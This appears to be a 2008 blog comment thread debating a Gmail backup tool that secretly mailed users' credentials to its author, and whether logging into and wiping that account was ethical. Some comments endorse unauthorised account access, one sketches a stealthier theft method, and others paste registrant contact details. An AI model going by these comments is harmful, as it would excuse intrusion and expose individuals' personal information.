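        "reset_ok": strong.complete_reset(token, "new pass", now=1100),
        "reset_replay": strong.complete_reset(token, "again", now=1100),
        "new_login_ok": strong.verify("alice", "new pass"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```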

This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having:
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?

Dave on March 8, 2008 10:05 AM

BTW: To Delete the GMail Account:
Open GMail Account
Click on Settings [upper right]
Click on Google Account Settings [near bottom]
Click on My Services - Edit
Click on Close account and delete all services and info associated with it
[didn't go any further than this]

Dave on March 8, 2008 10:18 AM

Even though Dustin Brooks got the email account deleted, thus destroying vital information, I think Jeff still has the screenshots. Isn't that enough to prosecute John Terry?

gogole on March 8, 2008 10:47 AM

Well done! Does anybody know who this John Terry is and his location?

Juanjo on March 8, 2008 10:56 AM

I have never understood how website features like "friend finder" got so successful that every social site has one version or another. Just the thought of a 3rd party site asking me for my username and password makes me cringe. But you'll be amazed at how even developers who are supposed to be savvy at things like this use these "friend finder" features.

Bart on March 8, 2008 11:10 AM

Registrant:
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: GARCHIVER.COM
Created on: 03-Apr-07
Expires on: 03-Apr-08

HOX on March 8, 2008 11:10 AM

Well done, Dustin!

Steven Fisher on March 8, 2008 11:11 AM

Registrant:
MateMedia, Inc.

POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MATEMEDIASOFT.COM
Created on: 08-Aug-03
Expires on: 08-Aug-08
Last Updated on: 07-Aug-07

Administrative Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Technical Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM
Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited

More on March 8, 2008 11:13 AM

This is precisely why I won't use "free" software that isn't open source or released by a "reputable" company.

haunches on March 8, 2008 11:13 AM

One name I did notice in the gmail screen cap in the contacts list is Pawel Lesnikowski. He's a writer of .NET components:

http://www.lesnikowski.com/

Maybe he might know this John Terry. This abuse of personal trust and privacy is appalling. I hope this site and application is flagged as a trojan and taken down by everyone in the shareware community.

Geoff Dalgas on March 8, 2008 11:25 AM

Dave -- if you think Dustin's ethics are the same as this other guy's, then you obviously don't really understand ethics all that well. There's nothing unethical about viewing source code of others (ripping it off is something else entirely), there's nothing unethical about stopping someone from harvesting identity information of others. Whatever ethical infractions might exist in using someone else's login information are well covered by the doctrine of double-effect.

Shmork on March 8, 2008 11:59 AM

I used a piece of software which has a demo-mode for an online service. Probably in demo-mode, the developer of the software was using his credentials, probably hardcoded in the software.

I realized, after using the software in demo-mode, that if I opened the website (gmail, yea it was google's api that software uses) in a browser, I logged into his gmail automatically. I thought it was some issue with Google. But later I realized it's because I used that software in demo mode, and new cookies were in place.

Anyway, I informed the developer, never heard back. I don't use that software anymore for two reasons:

1) Don't want my Gmail cookies replaced by others
2) I don't feel good, if I unintentionally log into his account


-abdul

Abdul Qabiz on March 8, 2008 12:16 PM

Makes sense.

sqoosh on March 8, 2008 12:29 PM

@Domenic - please stop programming, right now.

Ciaran on March 8, 2008 01:09 PM

Dave asked, "Were his [Dustin Brooks] actions /really/ any more "ethical" than John Terry's?"

To which the answer is a resounding "yes."

Ben Poole on March 8, 2008 01:11 PM

@stewie

Go on and live in your little world where everything would be just fine if there were no guns or missiles. I'm sure that before that everyone lived in peace and harmony, right? Of course, all you have to do is look at North America BEFORE 1492 and that goes right out the door.

And don't worry. People like me will continue to defend people like you so you can live in your safe little world.

Oogie

Oogie Pringle on March 8, 2008 01:43 PM

Cool ... it's OK to *steal* a log-in and password from source code, illegally log in to the email account and destroy all the messages [and the account, had the perp figured out how] -because- you guys didn't like what the vendor was doing.

You haven't the foggiest fricking idea what he was /actually/ doing with any of that information - but your assumption that he was up to no good gives you the warm and fuzzy you need to do whatever the hell you want. Bah ... I call BS!

Please don't confuse /any/ of this with any misguided perception that I condone what originally happened - I'm appalled -but- that doesn't give you the right ...

> the doctrine of double-effect
Horse hockey!

Both events [provided the first one is /actually/ illegal] should be punishable by law.

Have a pleasant day,

Dave on March 8, 2008 02:28 PM

ethical - conforming to accepted standards of social or professional behavior.

Neither act was ethical.

Anon on March 8, 2008 02:33 PM

That's why I don't trust shareware. They can leave you with a bunch of spyware and steal your personal information. The only software that I can trust is free (as in freedom) software.

Keitare on March 8, 2008 02:51 PM

Curious thought. The email address may have been embedded in the code and done what you say, but the snapshot of the inbox shows that ALL of those passwords and email addresses were NEW and UNREAD.

Although it was a completely dumbass way of going about things, I would probably deduce that the email account was set up to capture those for the lost passwords and account names for those who use the program or something equally idiotic. In no way am I saying this is the right thing to do, but the programmer was more than likely extremely foolish, but mostly oblivious to the trust he was violating.

On the other hand, the gentleman you say had alerted google of this, violates someone else's inbox, using someone else's information that required a bit of digging to get, trashes this other party's email account, and sends a note marking it for deletion.

This is ALSO a vast breach of proper ethics.
The first thing to do would be to alert the programmer of this error, and request that it is dealt with in an ethical manner that alerts his users of this "programming error" and then re-releases with a better password storage option, if any at all.

If this fails to get any attention, then report it to the proper authorities or agency for dealing with this issue, as well as Google.

Your friend may be in some hot water for his actions as well.

The Postindustrialist on March 8, 2008 03:09 PM

Another reason NOT to reveal your password in software.

nymphetamine on March 8, 2008 03:33 PM

Holy Living Funk! What a huge scam, I'm going to every shareware download site that will let me post a review of this and link to this article, great job! Really love your blog, everyday reader for a few months now.

jeremy on March 8, 2008 04:50 PM

Orange? I'm typing in orange, and you wrote about John Orange. Heh.

EVERYONE SHOULD USE OPENID TO AVOID THIS CRAP :)

Greg Magarshak on March 8, 2008 04:55 PM

IN GENERAL

if A does something illegal
and person B does something illegal to uncover it

B's evidence should be admissible in court
and both A and B should be tried for the crimes they committed.

In our current society, though, police may uncover crucial evidence without a warrant but it will be inadmissible in court. I think it is much more fair for the evidence to still be admissible in court AND for the officer to be tried for the crime of breaking and entering. If they want to risk a few years in jail to put a violent criminal behind bars, they should have the ability to do so.

Greg

Greg Magarshak on March 8, 2008 04:59 PM

[quote=dave]This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having:
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?
[/quote]

There is certainly an opportunity for academic debate on the ethics exhibited by Misters Brooks and Terry, but I know where I stand within that debate. Your view struck me right away, upon reading this article, but truthfully (non-violent) vigilante justice is consistent with my personal ethics, so I don't see a conflict here. Especially when it comes down to this kind of rarely prosecuted, yet extremely harmful crime. Mr. Brooks, we are to presume, would never log into someone's account maliciously. He was simply protecting himself, and others. Mr. Terry had no right to that information to begin with, I see no foul play in preventing him from accessing it, and forcing him to contact google... or sign up for another account, of course. I believe Mr. Brooks to be a hero without doubt.

jeremy on March 8, 2008 05:01 PM

Thank you Dustin Brooks for erasing the credentials. I was not on the list but you definitely made the world a better place. Also thanks for exposing the phisher and trojan malware author.

To those that say he did not do the right thing: There is NO excuse for harvesting passwords. Even if "John Terry" is merely a total moron it's inexcusable, and I'm not buying it; stealing users' passwords is done for ill gain.

I probably wouldn't do exactly as Brooks, such as I'd log in through Tor, get shocked like him, change the password, make sure there was no forwarding, notify all users by sending them a warning together with their respective account passwords to make sure they understand it's real, then not delete anything but get the attention of the police. But I'm in no place to complain as I wouldn't have refractored it in the first place. Again, he certainly did the best he could think of, it seems he probably did neuter it, and he made the details about the trojan public. Very good job.

Anonymous on March 8, 2008 05:33 PM

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

actually, dustin did miss one step. Mass emailing everyone involved to let them know what happened.

It's trivial for someone with your gmail user/password to set up a backdoor using email forwarding so that they'll get copies of any email with "password" in it or billing information.

Hell, all they have to do is change your "secondary password recovery email address" as well and they'll be able to hijack your account whenever they want to. I had this happen to me when the domain name for my password recovery email address got sold: http://internetducttape.com/2007/10/31/password-recovery-online-security/

engtech on March 8, 2008 05:33 PM

What if this article had been about Brooks getting caught in the email account where all he found was personal mail? There's little if anything to indicate that it was any more than a crap shoot (with pretty big odds in his favor admittedly) that he would.

Although he did state: 'I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box.'
Wonder how he noticed that about 'other' users.

In addition the comment: 'It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code.' - doesn't cause any alarms here, amazing. How would having a peek improve the functionality of the program?

Have your big hug-fest because a data farmer was snagged. What he did to get there, IMHO, was wrong. I won't bother arguing the issue any further, we seem to differ on opinion in this regard ... which is ok by me. It's all just the perspective I saw/read it from at any rate.

Dave on March 8, 2008 05:44 PM

> What if this article had been about Brooks getting caught
> in the email account where all he found was personal mail?

In this case perhaps he'd send the account an email suggesting "Terry" should change his password. And again, he would have helped someone.

> In addition the comment: 'It didn't really have the functionality
> I was looking for, but being a programmer myself I used Reflector
> to take a peek at the source code.' - doesn't cause any alarms
> here, amazing. How would having a peek improve the functionality
> of the program?

That's one of the ways malware is identified. It's really hard to turn it around against him, especially when we know what he did.

Anonymous on March 8, 2008 05:54 PM

*uses my handy-dandy CSI black-stripe decryptor to get the passwords from your image*

Anonymous on March 8, 2008 06:17 PM

Shouldn't you be putting a "nofollow" on the G-Archiver link?

Pádraig Brady on March 8, 2008 07:12 PM

Travis,
What if you like killing people? Your choices are limited in that case: join the military (if you can) and get paid to do what you enjoy, work for a weapons development company and get paid more, or commit a "crime". It's all about perspective and if you're working freelance or as an employee :).

Justin on March 8, 2008 07:31 PM

Dave wrote "You haven't the foggiest fricking idea what he was /actually/ doing with any of that information"

It doesn't matter what he was doing with it. Just collecting it without informing users that he was collecting it is either a breach of privacy laws and/or fraud.

Of course, if you don't think so, I have this new remote login application I'd like you to try. It doesn't email the IP, username, and password/SSH certificate used to me or anything!

Powerlord on March 8, 2008 07:48 PM

Shameless proselytising...

This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.

There is an ethical imperative here that overrides any economic rebuttal.

Justin Megawarne on March 8, 2008 08:12 PM

@Aaron - I would think linking to the original application is exactly the right thing to do, as CH is likely to show up as the first hit in Google for the software (as of right now it's number 4.)

@Joshua & others, the screenshot only shows that the most recent 1777 emails were unread - who knows how many thousands of people have tried the software. Plus, if they are being automatically forwarded they won't show up as read. I'm not sure that what Dustin did was right, but if he had to do it, he could have at least checked out the filters and saved the contact list first.

Interestingly the download and buy links on his site seem to be inactive. Also, I hope this doesn't hurt the reputation of garchiver, the GNOME archiving utility with the almost identical name.

Alex on March 8, 2008 08:13 PM

A.L. Flanagan wrote:
"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway."

Yes, but did Dustin do what's in *Dustin's* best interests? People have been prosecuted for simply reporting security issues in corporate websites, where the intent was benign, not malicious. It's gotten to the point that the best policy is to keep your mouth shut.

As Joe pointed out, Dustin has committed the following potential crimes (I am not a lawyer or police officer):
1) Accessing someone else's mail account, without permission
2) Deleting someone else's data, without permission
3) Destroying evidence

Of course, most will not argue Dustin did the wrong thing *morally*. But who knows, a judge might see it differently.

Here's a story where a university student could've been expelled for accessing unsecured data on a campus network:
http://chronicle.com/news/article/3146/university-allows-student-journalist-who-discovered-data-security-flaw-to-remain

Will on March 8, 2008 08:17 PM

It's gotten to the point that I am hesitant to run anything I don't write myself or download from a trusted source such as Microsoft or another major vendor.

The days of using stuff from Tucows or CNet have been over for quite some time for me - and then I read something like this and it confirms what were my worst fears.

Mr_Simple on March 8, 2008 08:43 PM

Damn.

Aalaap Ghag on March 8, 2008 08:54 PM

The "intellectual 'property'" clauses 5 and 6 are why I flatly refuse to join the ACM. I have no difficulty giving credit for authorship - that is to say, I agree with attribution rights and think plagiarism is fraud.

However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies.

5 and 6 are irreconcilable with the others.

1. copyrights and patents actively destroy human well-being.
2. Enforcement of copyrights and patents harm others.
3. Those who enforce copyrights and patents rather than waiving them are untrustworthy.
4. copyrights and patents discriminate against those who believe in free markets.
5. copyrights and patents are not proper property rights. In fact, they destroy physical property rights (even though you own something, you are not permitted to shape its physical form to convey certain information).

6. I have no difficulty giving credit to authors for authorship. The "proper credit" for "intellectual 'property'" is a massive "SCREW YOU" to whoever came up with the term.

7. Enforcement of patent and copyright in the technological limit (which the relevant infonazis are pursuing with digital restrictions management) requires gross violation of everyone's privacy to make sure people aren't (gasp) copying or using bits of information.

8. It's impossible to truly honour confidentiality while "respecting" copyrights and patents.

A. Programmer on March 8, 2008 08:58 PM

Can we now even trust the browsers?

Samrat Patil on March 8, 2008 09:06 PM

>Didn't Dustin email all the affected users to warn them to change their passwords?

I was thinking that too.

I hate to add to this long list of comments, but I can't help but notice this:
client.EnableSsl = true;
Irony anyone?

SmoothPorcupine on March 8, 2008 09:25 PM

"The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others."

If we consider those around us "equal in worth", where worth is the capacity to create, to dream, to love, etc, we also have to consider them equal to us in their capacity to invent ways to kill us. To the extent that a human is capable of good, he or she is also capable of evil.

"However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies."

I completely agree with your principles, but any serious set of ethics has to render unto Caesar what is Caesar's.

ben on March 8, 2008 09:45 PM

@A Programmer

The perpetual nature of US copyrights (70 years after the death of the creator plus however many years Disney wants added so they can keep Mickey Mouse out of the public domain) is the major problem with copyright law. I have no problem with using copyright to protect software; it worked for many years, it prevents wholesale theft while allowing independent invention.

Patent law is a whole different animal. Traditionally patents were awarded only for physical devices - software was only considered if it was part of a physical device. Now any jackass can patent math and dance (software and "business processes" such as Washington Mutual's branch office layout.)

I don't see any problem with ACM's approach regardless of my view that software patents are an egregious misuse of the patent system. Like it or not, it's the law and the right way to handle the issue is to tell the profession to obey the law as part of a code of ethics while working to get bad law changed. ACM does the former; does it do the latter? Given its membership and (more importantly) sponsorship, can it?

Contrast ACM's code of ethics with those of LOPSA (The League of Professional System Administrators - see http://lopsa.org/CodeOfEthics):

"I will educate myself and others on relevant laws, regulations and policies regarding the performance of my duties."

and

"As an informed professional, I will encourage the writing and adoption of relevant policies and laws consistent with [the LOPSA Code of Ethics]."

That said, I've decompiled Java to examine vendor source code to debug problems and nudge vendors toward fixing our issues. I've done code reviews on proprietary code to which I have had access to the source and have reported bugs back to the vendor (specifically for software that estimated the effects of radioactive material releases to the public.) In that case, the vendor issued an advisory and sent us a fix within a few days.

Experience has convinced me that whether software is proprietary or open, the end user must have access to the source code otherwise they have no assurance that the code even works or that the vendor's agenda aligns with their own. Code is the instantiation of the author's agenda - if the author is a grifter or thief, it will show in the code.

Bob on March 8, 2008 10:17 PM

@ Justin Megawarne

Being entitled to viewing the source code doesn't help at all. There's no way to actually verify that the site in question actually uses the source code as-is. That's a huge misconception that people have about open source software, especially open source-based online apps.

People assume, "well, look, the source code is available, everything must be on the up & up." For all they know, the site is 100% malicious but using the same interface. Really, the only way to be safe with open source is to diligently read the code and then compile it yourself, or to trust the community distributing it. Of course, that's not an option when you're on someone else's site.

OAuth, OpenID, etc. are vitally important options. Of course, they're still not ultimately friendly enough. And in the case of OpenID, there's still a huge level of trust that has to be placed on the provider (since Joe Shmoe will not have his own web site).

It's already bad enough that email is the focal point of almost all of a person's services/usernames/passwords... and losing access to your email effectively terminates your online self. Sure, Google can be trusted with email, to a degree. That's not necessarily the issue. The issue is just how *EASY* it is for someone to get your email user/pass. Use any machine that has a keylogger (hardware or software) installed by a user or virus, and boom... everything you've ever done and use is in someone else's hands.

I suppose the only way to combat that is biometrics + some form of verification that relies on a floating, constantly changing password somehow. :S

Zm on March 9, 2008 01:32 AM

@ Justin Megawarne

Oh, sorry, I re-read what you said. You meant a piece of software like G-Archiver. Of course, what you suggest wouldn't be fair or legally possible.

How 'bout this for an idea along those lines: a third-party that verifies software as "safe". It would be the BBB/Verisign of sorts for software. I suppose, the company or independent developer would then pay the verification service based on the complexity/length of the code. The service would verify various points, ensuring the software won't screw a user, then give a quality seal w/ lookup online, as well as the hash or whatever to verify it's the same software.

That would allow developers to keep their intellectual property and get their software used more. And that'd be great for users as well. Oh, and great for a business if the costs can be worked out.

I don't know, maybe things like that exist (probably).

Zm on March 9, 2008 01:51 AM

There is no John Terry. From the password you can guess it's some Asian dude wannabe hacker, and the site you mentioned to download from is a bad site to download things from. Try download.com next time.

NOTE: It's not about programming ethics or programmers. There are good and bad people. And well, if everyone had ethics (bah humbug!) then the world would have been a better place and no one would create viruses, hack tools, root kits (Sony!) etc....

Lame post I tell ya.

PS: Hope you don't censor this! (free right to opinion)

GlaB on March 9, 2008 05:29 AM

@Justin Megawarne

"This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash."

This is one reason that the police should be entitled to examine a citizen's emails and personal correspondence, without fear of legal backlash.

"There is an ethical imperative here that overrides any economic rebuttal."

There is a public safety imperative that overrides any privacy rebuttal.

I thought your arguments sounded familiar.

Geri on March 9, 2008 05:47 AM

Haha, this is probably one of the dumber identity thieves I've heard of. Why embed his own username and password and risk it being extracted when THE USER JUST ENTERED THEIR OWN SET? He could've just used theirs and sent an e-mail using those credentials! The only problem then is that an e-mail might appear in their sent folder (until he immediately deletes it).

Of course that wouldn't have prevented its detection. Assuming this is a .NET program (that's the only Reflector I know) there is no way to prevent decompiling unless you use one of those expensive scrambling/obfuscating programs (there might be a free/open source one as well, wouldn't surprise me, but I don't know of any ATM).

Dan on March 9, 2008 06:51 AM

(ironic mode:on)
I need my ex-girlfriend gmail password, it's very important! please send me it at my hotmail account.
Thanks
(ironic mode:off)

;-)

salsa on March 9, 2008 06:56 AM
As was already mentioned, you can easily backup your gmail with, say, thunderbird, in 5 easy steps:

http://blogoscoped.com/forum/22775-full.html#id24184

MSpreij on March 9, 2008 07:34 AM

This is truly a sad story =( Us geeks are often privy to a LOT of very confidential, sensitive information, be it logins, financial data or even business plans. There is implicit trust as soon as people fire up your application, and that trust should never be abused. It's unethical, immoral and, excuse the language, but just makes you an a-hole!

Well done though Dustin for figuring it out and doing the right thing! Did anyone ever find out if he emailed the people that had been stung to get them to change their account information?

Hell of a good reason to fire up reflector on any shareware that you enter account information into..

Good job the idiot didn't have the brains to store his password in some sort of encrypted format! =D

Rob on March 9, 2008 09:02 AM

I must say, I love the comments about how if this were open source, this could never have happened.

Consider this:
1) I make some application
2) I package up the source code
3) I inject malicious code and compile said source code
4) I put both the 'clean' source and malicious binary files on (say) Sourceforge and mark it as GPL.

How many people, do you think, are going to actually check that the source and binaries match, or compile it themselves from source?

Open Source Software is not the answer to preventing this kind of abuse in trust.


As for the comments that this was possibly just debugging information let loose - take another look at the source code. It's pretty obvious that this is NOT just debugging info.

It's also unfortunate that Dustin probably broke several laws doing the right thing to protect these folks who had been exploited.

Will Hughes on March 9, 2008 01:25 PM

The worst thing is that now our dear Jeff (probably) won’t stop cheating but will become smarter covering his @ss while doing it.

rockordie on March 9, 2008 01:35 PM

We all applaud DB for doing what, in the end, is right.

However his actions weren't (entirely) ethical. After DB logged onto gmail and verified that the code was stealing username/passwords he should have stopped. It can be argued that up to that point he couldn't know his assumptions were correct. There's often dead code, and the code discovered code doing the emailing could have been 'test' code for all DB knew.

Additionally, using Lutz's Reflector isn't illegal. JT made no attempt at obfuscating his code, encrypting, signing, etc. No more illegal than using a screwdriver to open a TV set. Why do coders/politicians/police think that some legally magical properties are given to some binary output after being processed by a compiler?

However much I'm in favor for DB's actions, once he deleted the emails he's trashing evidence and exposing himself to prosecution/liability (in some countries at least). We cringe when an honest guy gets trashed because he was trying to do good.

If DB just changed the password that would have been OK, because all that does is prevent the malicious software from operating, and doesn't cause any long-lasting damage.

That said, I really doubt that DB thought out his actions once logging onto gmail. He reacted, probably like many of us would. I imagine being in that situation, freaking out, and doing the exact same thing as a knee-jerk reaction.

So save your harsh comments for JT instead, because he deserves them, as well as deserving prosecution.

tiger on March 9, 2008 01:56 PM

I'm lost trying to figure out the point of this article. Other than mentioning something vaguely smart and hand-wavily academic (like the ACM code of conduct), I don't spend my time reading Coding Horror to hear about simplistic disassembly of crude pieces of spyware; there are much better resources for that.

Deleting the email data in question was a really dumb knee-jerk reaction, although I trust that Google are well equipped to deal with this kind of stupidity.

For those just tuning in to this thing called the Internet, creating quasi-useful pieces of software that act as a conduit for malware is nothing new. Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

Given that GMail provide POP3 and IMAP access, I cannot understand why even a rookie technophile would go off in search of a specialist tool for archiving mail. For what it's worth, I use the excellent little mpop utility for backing up my GMail, although offlineimap works too.

David Wilson on March 9, 2008 02:02 PM

AFAIK, the information in the gmail account is not actually deleted, in the sense that Google could still recover it if they wanted to, although that would probably require a court order. It might be worth seeing if law enforcement wants to take an interest in this guy - it's not too late.

Zen419 on March 9, 2008 03:05 PM

>Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

since 1908?

geoff on March 9, 2008 03:54 PM

@David Wilson,

How on earth can you compare FunWebProducts (which bundled basic, but irritating, adware - stupid pop up windows and toolbars) with a program coded to steal usernames and passwords?

Sam Spade on March 9, 2008 04:19 PM

If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

Matt on March 8, 2008 08:45 AM

Wow, that has to be the stupidest comment ever.

FaRsIdE on March 9, 2008 04:56 PM

Every snowflake of an avalanche proclaims its innocence... >.>

grace on March 9, 2008 05:28 PM

@Geri:

You can't port someone's opinion over from one thing to another. If I'm running software on my computer, I have a right to know what it does. The police only have a right to spy on people when they have reasonable grounds to believe it is necessary -- there's almost nobody who thinks that police should NEVER be allowed to read private mail; the only real argument is WHEN "there is a public safety imperative that overrides any privacy rebuttal."

Your argument is facile.

Andrew on March 9, 2008 05:34 PM

Agree with A. Programmer above; copyrights and patent are not property rights, and there is no such thing as "intellectual property".

Anais Non on March 9, 2008 06:42 PM

It might have been more wise to datamine the usernames from his inbox, and do a mass-mailing to all of them telling them to change their password. You definitely did a good thing, though. Hopefully Google can take care of informing the users to change their passwords.

reid on March 9, 2008 07:27 PM

Why do you need junk software like this when you can simply use **any** email client, via POP and backup your mail locally? It's not like yahoo or hotmail where you have to pay for POP access. Duh?!?

Matt on March 9, 2008 08:16 PM

This would never happen in the Linux world because the approvers of binary packages we download from our distribution vendor must first have access to the source code, and they review the source for malicious items like this. And on Ubuntu, this is doubly so because packages are reviewed by the Debian team, then by the Ubuntu team.

So, Windows users, you might want to start getting the source and compiling stuff yourself rather than using binary executables.

Volo Mike on March 9, 2008 08:58 PM

Before we point fingers of Linux vs. Windows and claim how you should have done this or that, we need to take a bit of action:

1). Everyone here should email abuse@godaddy.com and tell them that a site they've registered is doing something that is probably illegal. The site is registered by GoDaddy under the name of MateMedia:

Administrative Contact:
Inc., MateMedia hostmaster@matemediainc.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
(877) 309-7521

Next, if anyone of you know someone who has fallen for this, have them write a complaint to the Attorney General of Florida: http://myfloridalegal.com/contact. There is a complaint form: FILL THAT OUT! Don't just email the Attorney General, fill out the form at http://www.myfloridalegal.com/ConsumerComplaint.pdf.

They will track down this guy (easy enough to do with a few court orders) and go after him. He has committed fraud (especially since he's taken money for this program), electronic theft, and possible identity theft.

BTW, you might find this article of interest: http://www.quickregister.net/articles/customerservice/4_Customer_Service_Mistakes_Companies_Should_Avoid.html. Apparently, his name here is "Russ Mate".

Here's a few more URLS http://www.russmate.com/
http://mediamateinc,com

David W. on March 9, 2008 09:12 PM

Might I suggest that you change the title of this post to something like "Don't use G-Archiver" so that it shows up as an immediate clear warning in search results. It already shows up as #3 in search results for g-archiver, but g-archiver itself is #1.

Richard Schwartz on March 9, 2008 09:13 PM

I am in no way defending what happened here, but in all honesty blaming shareware is not really fair. If anyone had gone to the "company's" site and taken a look at it, they probably never would have installed it given how shady it looks. That's just common sense, I am sorry.

There are legitimate companies out there that get listed on shareware sites, be it from themselves or from affiliates.

Matthew R. Miller on March 9, 2008 09:40 PM

Shocking indeed, is there a way to announce and create awareness so in future other innocent users don't fall into this trap?

Ajo Paul on March 9, 2008 09:43 PM

A few comments on Dustin Brooks' ethics:

Dustin Brooks did no wrong in using Reflector. There is nothing in the G-Archiver license that prohibits using Reflector in examining the source code.

Dustin Brooks took immediate action when he suspected that his Gmail address was stolen. Normally, you don't log onto someone else's account, but in this case, Dustin Brooks had immediate knowledge that his Gmail account information was stolen, and had to take immediate action to prevent theft.

Dustin Brooks saved thousands of people from getting their email addresses stolen by deleting them from this account. He has saved thousands more from getting their email stolen by deleting the account and locking it.

Saying Dustin Brooks acted unethically is like saying someone who runs into a burning building and saves a baby acted unethically because they didn't ring the doorbell and ask permission to enter and thus trespassed onto someone else's property.

The account in question was obviously used to steal email addresses from other people. Dustin Brooks' quick thinking saved them from having their accounts stolen.

There are two other things Dustin Brooks should do: If possible, contact these people and let them know their Gmail accounts might have been compromised. He should also contact Google and let them know about this account and contact the Attorney General's office to file a complaint.

As for Russ Mate who is shocked! shocked! that this happened on one of his accounts, why is the garchiver site still up and running? Certainly, you as the technical contact and registrar have the power to take this site off the air. If someone contacts you about g-archiver, are you willing to reveal the name of the client, so others can get in contact with them, or to be able to file charges against this client?

David W. on March 9, 2008 10:01 PM

Why did you link to the software as well? Gives it promotion.

Matthew R. Miller on March 9, 2008 10:22 PM

BTW, I have a small and OPENSOURCE Python script to backup your whole GMail account (inbox, archives, sent) in the standard mbox format.

You can review the sourcecode yourself: There are only 23 lines of code.

http://sebsauvage.net/python/snyppets/index.html#archive_gmail

sebsauvage on March 10, 2008 01:29 AM

I would like to pose a hypothetical situation for people to consider.

If some sort of potentially IMMEDIATE risk were occurring, like, say... I left my keys in a bus station, and a friend of mine saw someone that neither one of us knew, entering my house... there are some things I would like him to do.

1) Phone me - Dustin SHOULD have emailed everyone on the list, I agree... however, all of this information seems to be included in R/E line.. or the body...? In any event, it does not look like it would be as easy as clicking "forward", or anything else like that, it looks like 1700+ emails worth of cutting and pasting.

if the hypothetical friend of mine (i have no actual friends) who saw the intruder didn't have a cel phone, was out of time or dropped it and broke it, that's ok... I WOULD APPRECIATE SOMEONE ACTING IN MY BEST INTEREST. I would hope my friend would carry on to ...

2) Approach my house and ask what is going on - Dustin looked through the emails, and came to a conclusion which, I think we can all agree, was a no-brainer. The few reasons for having a list of this information are few, and none of them are in the best interest of the person doing it.

The chances that this list were an innocent list of names, for say demographics, are stupidly slim.

If my friend saw this person, say, stealing my stuff through the window... I would hope that they would take some action!

Incidentally, if Dustin approached the house and announced himself to ask what was going on, he may put himself in danger - or the intruder may run off with my keys. So, maybe the metaphor isn't PERFECT, but it's 5:45 am.

3) Inform the Authorities - Dustin informed Google. Nuff said. My friend should call the police, number one. However, that (in my mind) does NOT preclude ...

4) Act to save my stuff - Go in and knock the guy out! I certainly won't charge my friend with trespassing, and I don't think the cops in MY home town would charge him with assault. This would probably end up being one of those "He must've fallen while trying to escape and given himself 4 black eyes" cases.

Maybe the metaphor is wrong in several ways, since it doesn't really convey the immediacy of the threat... what if my friend saw this intruder, lighting a match and setting it to my sofa? What if the problem were so immediate, that every passing second could spell disaster?

To anyone who knows me;

If I see someone about to burn your house down, and the battery on my cel phone is dead, I will
a) Enter your home
b) grab a fire extinguisher
c) douse him with it
d) knock him upside the head with it until he stops moving
e) use your phone to call the cops

I would do so in the full knowledge that you could, for example, charge me with breaking and entering, or he could charge me with assault. Hopefully, he didn't die from the battery.

Oh, and by the way, Dustin... THANK YOU! Don't pay any attention to people who BS about legal crap. You did, IMHO, the right thing. Yeah, you didn't email the people, but in the heat of the moment... sometimes we forget to plug in our cel phones. Everyone on that list is grateful to you, I am sure. I sincerely hope you interrupted a bot and crashed a server when you did it.

Philip Snelgrove on March 10, 2008 02:48 AM

"and none of them are in the best interest of the person doing it."
=
"and none of them are in the best interest of the people whose information is so stored".

Philip Snelgrove on March 10, 2008 02:50 AM

I think the point here is not about ethics as you can never rely on someone else to have ethics... It's more about protecting your information.

Passing your username and password to anyone for anything should always be done extremely carefully.

On a similar theme, one of my pet hates is websites that require you to register on them. You create a username and password, they then immediately email you your credentials (so you don't forget them?).

I then kick myself for having used one of my current "strong" passwords for them to then send in an email in plain text! Where's the ethics in that?

Robin on March 10, 2008 03:09 AM
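Robin's pet hate has a concrete technical cause: a site that can email you your password back must be storing the password itself, whereas a site that keeps only a salted, iterated hash has nothing to send back and can still verify a login. The following is an added illustration in Python, not code from the post or from any commenter; the two registration functions and the in-memory "user table" are hypothetical names chosen for the example.

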